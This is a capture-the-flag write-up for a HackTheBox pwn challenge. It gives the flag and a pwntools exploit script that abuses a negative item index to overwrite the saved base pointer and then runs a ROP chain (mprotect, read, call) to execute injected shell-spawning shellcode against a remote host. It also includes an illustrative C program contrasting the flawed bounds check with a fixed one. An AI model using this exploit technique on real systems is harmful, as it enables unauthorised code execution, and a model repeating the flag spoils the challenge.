I see you are new in town, adventurer! Here you can pick whatever you want to continue your journey. Need a pet companion? Our arachnoids are the best. Ready to fight? Our pistols are here for you. Lost in time? Our watch will definitely save you!
Category: pwn
Solver: t0b1, s3rp3ntL0v3r
Flag: HTB{00b_4nd_p1v0t_2_th3_st34m_w0rld!}
Writeup
See solve script below.
Solver
from pwn import *
LOCAL = False
HOST = '167.172.52.221'
PORT = 30371
CHALLENGE = './salesman'
context.terminal = ['tmux', 'splitw', '-h']
# context.arch = "amd64"
context.log_level = "info"
context.binary = elf = ELF(CHALLENGE)
re = lambda a: p.recv(a)
reu = lambda a: p.recvuntil(a)
rl = lambda: p.recvline()
s = lambda a: p.send(a)
sl = lambda a: p.sendline(a)
sla = lambda a,b: p.sendlineafter(a,b)
sa = lambda a,b: p.sendafter(a,b)
p = gdb.debug(CHALLENGE, '') if LOCAL else remote(HOST, PORT)
# Chain: make the binary's mapping at 0x400000 (non-PIE base) RWX, read
# shellcode into it over stdin, then jump to it.
rop = ROP(elf)
rop.mprotect(0x400000, 0x1000, 0x7)
rop.read(0, 0x400000, 0x100)
rop.call(0x400000)
payload = b'A' * 8
payload += rop.chain()
# Out-of-bounds item index -2: the 8 filler bytes overwrite the saved base
# pointer and the ROP chain follows directly after it.
sla(b'Item: ', b'-2')
sla(b'> ', payload)
# The menu's for loop reads its counter relative to $rbp. Since we overwrote
# the saved base pointer and the memory it now points at is zero-initialised,
# the loop runs three rounds instead of two: the write above plus two more
# harmless ones before the function returns into the chain.
for i in range(2):
    info(f'Run {i+1}')
    sla(b'Item: ', b'0')
    sla(b'> ', b'a')
info('Done')
# The read() call in the chain pulls the shellcode into the now-RWX page at
# 0x400000 (up to 0x100 bytes), and rop.call(0x400000) executes it.
shell = asm(shellcraft.sh())
p.sendline(shell)
p.interactive()
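The out-of-bounds write the script relies on (menu item index -2, which the comment says reaches the saved base pointer) follows a common pattern: the index is checked against the array size but not against zero. The C program below is an added example, not the challenge binary's source. The element size, the number of item slots and what sits below the array are assumptions chosen for illustration; the page only tells us that index -2 reaches the saved base pointer. It contrasts the upper-bound-only check with a two-sided one and shows which of the two lets index -2 land in the simulated saved state below the array.

```c
#include <stdio.h>
#include <string.h>

#define NITEMS  3            /* assumed number of item slots */
#define NAMELEN 16           /* assumed size of one slot */
#define BELOW   2            /* slots of simulated saved state below the array */
#define STACK_BYTES ((BELOW + NITEMS) * NAMELEN)

/* Assumed vulnerable check: only the upper bound is tested, so a negative
 * index such as -2 passes and addresses memory below the array. */
int vuln_index_ok(long idx) {
    return idx < NITEMS;
}

/* Hardened check: both bounds, on a signed type, before any pointer math. */
int safe_index_ok(long idx) {
    return idx >= 0 && idx < NITEMS;
}

/* Simulated frame: BELOW slots of "saved state" (standing in for the saved
 * base pointer / return address) followed by the item array. The frame is one
 * flat buffer so that a negative index is plain arithmetic, not UB.
 * Returns the byte offset written, or -1 if the check refused the index. */
long store_item(unsigned char *frame, long idx, const char *name,
                int (*ok)(long)) {
    if (!ok(idx))
        return -1;
    long off = (BELOW + idx) * NAMELEN;   /* idx = -2 lands on offset 0 */
    size_t n = strlen(name);
    if (n >= NAMELEN)
        n = NAMELEN - 1;
    memcpy(frame + off, name, n);
    frame[off + n] = 0;
    return off;
}

/* Did a write clobber the simulated saved state below the array? */
int saved_state_clobbered(const unsigned char *frame) {
    for (int i = 0; i < BELOW * NAMELEN; i++)
        if (frame[i] != 0)
            return 1;
    return 0;
}

/* Run one scenario end-to-end on a zeroed frame; returns 1 if the write
 * reached the saved state, 0 if it was refused or stayed inside the array. */
int run_scenario(long idx, int (*ok)(long)) {
    unsigned char frame[STACK_BYTES];
    memset(frame, 0, sizeof frame);
    long off = store_item(frame, idx, "AAAAAAAA", ok);
    return off >= 0 && saved_state_clobbered(frame);
}

int main(void) {
    printf("idx -2, upper-bound-only check: clobbered=%d\n",
           run_scenario(-2, vuln_index_ok));
    printf("idx -2, two-sided check:        clobbered=%d\n",
           run_scenario(-2, safe_index_ok));
    printf("idx  1, two-sided check:        clobbered=%d\n",
           run_scenario(1, safe_index_ok));
    return 0;
}
```

The check is deliberately written on a signed `long` rather than casting the index to `size_t` first: an unsigned compare such as `(size_t)idx < NITEMS` would also reject -2, but it hides the intent and breaks as soon as someone later widens the array or changes the type.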